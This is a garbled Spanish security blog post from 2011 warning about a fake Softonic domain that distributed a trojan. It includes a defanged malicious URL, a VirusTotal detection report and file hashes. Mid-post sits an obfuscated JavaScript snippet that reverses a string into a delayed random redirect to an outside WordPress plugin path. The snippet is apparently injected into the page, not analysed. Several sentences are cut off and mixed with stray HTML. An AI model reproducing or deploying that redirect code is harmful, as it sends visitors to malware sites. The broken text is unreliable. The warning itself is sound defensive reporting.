MUCHO CUIDADO : FALSO DOMINIO DE SOFTONIC creado para infectar
Softonic.com es uno de los portales de descargas más conocidos en español, tan solo en el mes de agosto más de 100 millones de personas lo visitaron en busca de programas, por lo que no resulta extraño que algunos atacantes aprovechen su marca para infectar.
Esto es lo que están haciendo con un dominio falso que simula ser Softonic, fue registrado hace unos días, aún está operativo pero ya se encuentra en varias listas negras de phishing y malware (procura no entrar, si lo haces tu computadora se podría infectar):
tonic en su sitio:
tos a los troyanos se propagan mediante spam (correo, comentarios en foros y blogs, redes sociales, etc) sería sencillo engañar a los usuarios, pues muchos creerían que están descargando el programa desde Softonic lo cual se considera una “descarga segura”. Un ejemplo podría ser la siguiente URL (no entrar ni descargar el archivo, es un troyano!):
URL maliciosa: hxxp://firefox.en-softonic . net / firefox_6.0.1.exe
Descarga desde el sitio falso
$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tonic-falso-utilizado.html”> Fuente
Informe de VirusTotal sobre fichero .EXE infectado contenido en las carpetas de dicho dominio:
File name: chrome_11.0.696.68.exe
Submission date: 2011-09-16 05:16:17 (UTC)
Current status: finished
Result: 16 /44 (36.4%)
VT Community
not reviewed
Safety score: –
Compact Print results
There is a more up-to-date report (16/44) for this file.
Antivirus Version Last Update Result
AhnLab-V3 2011.09.15.05 2011.09.15 Trojan/Win32.Jorik
AntiVir 7.11.14.212 2011.09.15 –
Antiy-AVL 2.0.3.7 2011.09.16 –
Avast 4.8.1351.0 2011.09.15 –
Avast5 5.0.677.0 2011.09.15 –
AVG 10.0.0.1190 2011.09.15 –
BitDefender 7.2 2011.09.16 Gen:Variant.Kazy.37695
ByteHero 1.0.0.1 2011.09.13 –
CAT-QuickHeal 11.00 2011.09.16 –
ClamAV 0.97.0.0 2011.09.15 –
Commtouch 5.3.2.6 2011.09.16 –
Comodo 10131 2011.09.16 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2011.09.16 –
Emsisoft 5.1.0.11 2011.09.16 Win32.SuspectCrc!IK
eSafe 7.0.17.0 2011.09.15 –
eTrust-Vet 36.1.8563 2011.09.15 –
F-Prot 4.6.2.117 2011.09.16 –
F-Secure 9.0.16440.0 2011.09.16 Gen:Variant.Kazy.37695
Fortinet 4.3.370.0 2011.09.16 W32/Kryptik.CQW!tr
GData 22 2011.09.16 Gen:Variant.Kazy.37695
Ikarus T3.1.1.107.0 2011.09.16 Win32.SuspectCrc
Jiangmin 13.0.900 2011.09.15 –
K7AntiVirus 9.113.5140 2011.09.15 –
Kaspersky 9.0.0.837 2011.09.16 Trojan.Win32.TDSS.cnak
McAfee 5.400.0.1158 2011.09.16 DNSChanger.cq
McAfee-GW-Edition 2010.1D 2011.09.15 Artemis!29792B72AEEF
Microsoft 1.7604 2011.09.15 Trojan:Win32/Alureon.FE
NOD32 6467 2011.09.16 –
Norman 6.07.11 2011.09.15 –
nProtect 2011-09-15.01 2011.09.15 Gen:Variant.Kazy.37695
Panda 10.0.3.5 2011.09.15 Suspicious file
PCTools 8.0.0.5 2011.09.16 –
Prevx 3.0 2011.09.16 –
Rising 23.74.03.03 2011.09.09 –
Sophos 4.69.0 2011.09.16 –
SUPERAntiSpyware 4.40.0.1006 2011.09.16 Trojan.Agent/Gen-RogueSoft
Symantec 20111.2.0.82 2011.09.16 –
TheHacker 6.7.0.1.297 2011.09.15 –
TrendMicro 9.500.0.1008 2011.09.16 –
TrendMicro-HouseCall 9.500.0.1008 2011.09.16 –
VBA32 3.12.16.4 2011.09.15 –
VIPRE 10490 2011.09.16 Win32.Malware!Drop
ViRobot 2011.9.16.4671 2011.09.16 –
VirusBuster 14.0.214.0 2011.09.15 –
Additional informationShow all
MD5 : 29792b72aeef547ee30613cf9a60d22b
SHA1 : 0077bfa7cf7659e44c5f548aabdbd9454c965873
File size : 311296 bytes
publisher….: My(c) SystemS
copyright….: My(c) SystemS Corp All Rights reserved
product……: InvertedWare
description..: InvertedWare
original name: fajmed.exe
internal name: fajmed
file version.: 0.R146.31343T RC4.243b alpha
Ya se puede detectar con nuestro ELIMD5.EXE entrando su hash: 29792b72aeef547ee30613cf9a60d22b
saludos
ms, 17-9-2011
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Los comentarios están cerrados.